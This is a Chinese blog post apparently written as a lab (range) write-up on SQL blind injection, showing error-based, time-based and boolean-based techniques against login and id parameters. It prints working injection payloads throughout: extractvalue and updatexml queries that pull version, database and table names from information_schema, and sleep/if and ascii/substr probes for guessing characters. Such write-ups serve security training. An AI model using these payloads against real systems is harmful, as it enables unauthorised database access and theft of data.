web安全之SQL盲注的靶场练习和分析

已于 2022-12-10 01:04:44 修改
阅读量588 收藏 1
点赞数 1
分类专栏: # web安全 文章标签: web安全 安全 sql 网络安全
于 2022-12-06 21:29:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128208295
版权

目录

SQL盲注-报错回显盲注

SQL盲注-时间盲注

SQL盲注-布尔盲注

 

SQL盲注-报错回显盲注

在burp里面进行动态抓包,判断符号闭环,如图明显为'闭环

8635de1538934df8b0b975657a2da4c0.png

9ca85a7176a1432fb0432b5e16ff25e9.png

列数3时报错,判断当前列数为2 

6e3acd72a8ac4473bbd0c76e835d4955.png

强行报错注入 ,如图获取到版本号 

uname=1212' union select 1,extractvalue(1,concat(0x7e,(select version()),0x7e))#&passwd=12313&submit=Submit

uname=1212' or updatexml(1,concat(0x7e,database()),0)or'#&passwd=12313&submit=Submit

uname=1212' or extractvalue(1,concat(0x7e,database())) or'#&passwd=12313&submit=Submit

d8a49611262042e3b875df0f38a508c8.png

通过updatexml 或者extractvalue进行报错盲注 

uname=1212' union select 1,extractvalue(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e))#&passwd=12313&submit=Submit

uname=1212' union select 1,updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 3,1),0x7e),2)#&passwd=12313&submit=Submit

uname=1212' or updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 3,1),0x7e),2) or '#&passwd=12313&submit=Submit

注意:发现一次放不完,于是用limit进行分页操作,依次取0,1;1,1;2,1;3,1...进行查询 

a47bbdcadc4640d5980ab569d4955280.png

 

SQL盲注-时间盲注

sleep(): Sleep 函数可以使计算机程序(进程,任务或线程)进入休眠

if(): i f 是 计算机编程语言一个关键字,分支结构的一种

mid(a,b,c): 从b开始,截取a字符串的c位

substr(a,b,c): 从b开始,截取字符串a的c长度

left(database(),1),database() : left(a,b)从左侧截取a的前b位

length(database())=8 : 判断长度

ord=ascii ascii(x)=100: 判断x的ascii值是否为100

例如:

?id=1 and sleep(if(length(database())=8,5,3))#
?id=1%20and%20sleep(if(mid(database(),1,1)=%27s%27,3,0))#

输入后发现存在延迟 

coleak' or sleep(3)#

8ee4287793d34196b59319d0965d2ad3.png

测试长度,判断为7

coleak' or sleep(if(length(database())=8,0,2))#
coleak' or sleep(if(length(database())=7,0,2))#

分别猜测每位的字符

coleak' or sleep(if(mid(database(),1,1)='p',0,2))#

后续依次爆破每位的字符 

 

SQL盲注-布尔盲注

此关卡连or都无法使用 ,此时只能通过前面获取的name来解题

e60be76a0965466cba69cc2d096d23b0.png

4110385273a348189be77f129a7072e9.png

15e8f7a5036e41b2bb264aedf6c57308.png 

lucy' and length(database())=7#

接下来通过二分法进行拆解

lucy' and ascii(substr(database(),1,1))= 112 #

7e66234a8aae4d178fa628fc3a128e7d.png

 接下来继续爆破数据库即可

 

coleak
关注
专栏目录
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4826
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
wirehark数据分析与取证hack.pcapng
Aluxian_的博客
09-26 3882
wiresharekhack.pcapng数据包数据包下载 请私信博主。
VNCTF 2024 sqlshark 详细WP
Mutsa的博客
02-21 1119
VNCTF 2024 Misc sqlshark 详细题解,小白也能看懂
墨者靶场 SQL注入漏洞测试(报错盲注)通关思路
zyh1588的博客
11-01 356
小白回顾墨者靶场sql报错注入
web安全sql注入
weixin_54584489的博客
02-21 635
本文主要为sql注入学习,对sql注入进行整体自我学习概括
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4189
一次简单的SQL注入靶场练习
web安全SQL注入(三)
Longwaer
02-16 760
通过文章详细学习SQL注入的各种场景,了解掌握SQL注入的原理及检测方式,更好用于渗透测试。
Web安全SQL各类注入与绕过
likinguuu的博客
03-06 2731
这一篇文章涵盖了sqli-labs-master靶场遇到的所有注入与绕过,也给出了我的做题思路与过程,链接一并附在上面了,这一篇文章前面还是挺细致的,后面就慢慢变得简单了,因为很多知识和前面的重复了,也没必要。总之不会的话,菜就多练。
CTF-WEB 一个登录框SQL盲注
热门推荐
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
sql注入靶场.zip
06-24
靶场的核心是sqli-labs,这是一个开源的SQL注入练习平台,特别适合初学者和专业人士用来增强对SQL注入的理解。它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠...
sql-bypass靶场
03-19
SQL注入(SQL Injection)与Bypass技巧】 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在输入字段中插入恶意的SQL代码来操纵数据库。...通过这个靶场练习,我们可以提升对SQL注入漏洞的理解和防御能力。
pikachu靶场练习
qaq517384的博客
01-12 2552
pikachu靶场练习暴力破解基于表单的暴力破解 暴力破解 基于表单的暴力破解 随便输入一个用户名和密码,然后bp抓包 抓包送入intruder模块 选中第四个模式 为账号和密码分别导入自己的字典,就可以start attack开始爆破了 根据相应的长度判断是否登陆成功 爆破出一个简单的账号密码:admin/123456 ...
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 1998
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1308
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
No.2 笔记 | 网络安全攻防:PC、CS工具与移动应用分析
l1x1n0的博客
10-05 1201
Cobalt Strike是一款基于Java的高级渗透测试工具,支持多人协同操作。它被称为"线上多人运动平台",功能强大且灵活。通过学习PC端和移动端的恶意程序利用技术,以及Cobalt Strike这一强大的渗透测试工具,我们不仅掌握了一些网络攻击的基本原理和技术,更重要的是提高了自身的网络安全意识。然而,我们必须时刻牢记,这些知识的学习目的是为了更好地理解和防御网络攻击,而非从事任何非法活动。作为负责任的网络公民,我们有义务遵守相关法律法规,保护自己和他人的网络安全
Web安全 - 重放攻击(Replay Attack)
小工匠
10-01 1402
重放攻击(Replay Attack)是一种网络攻击方式,攻击者通过截取并重复发送已经捕获的合法通信数据包,企图在受害者不知情的情况下冒充合法用户进行操作。这种攻击常见于不安全的网络协议中,攻击者无需破解通信内容,只需重发合法的消息即可造成安全威胁。重放攻击的潜在危害包括:未授权的交易执行、非法获取资源、数据泄露以及系统篡改等。随着网络系统的日益复杂,重放攻击仍然是一个常见的威胁,尤其是在不具备防御机制的旧协议或自定义通信方案中。使用缓存减少存储开销。利用异步处理避免阻塞主线程。
网络安全】利用XSS、OAuth配置错误实现token窃取及账户接管 (ATO)
最新发布
等风来
10-08 169
在过去,可以通过在两个子域名的 JavaScript 中显式设置 document.domain 来实现跨域访问,即在 sub1.target.com 和 auth.target.com 中都设置 document.domain = 'target.com';。这样,它们就共享了同一个源,浏览器将允许 JavaScript 之间的交互(例如相互访问变量、调用函数等)。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2445
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
SQL盲注技术原理与应用实践
网络安全原理与应用:SQL盲注 SQL盲注是指攻击者无法从页面上获取执行结果,甚至连注入语句是否执行都无从得知的注入攻击方式。相比一般的注入攻击,盲注的难度要高。手工盲注的过程类似于与机器人聊天,需要询问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值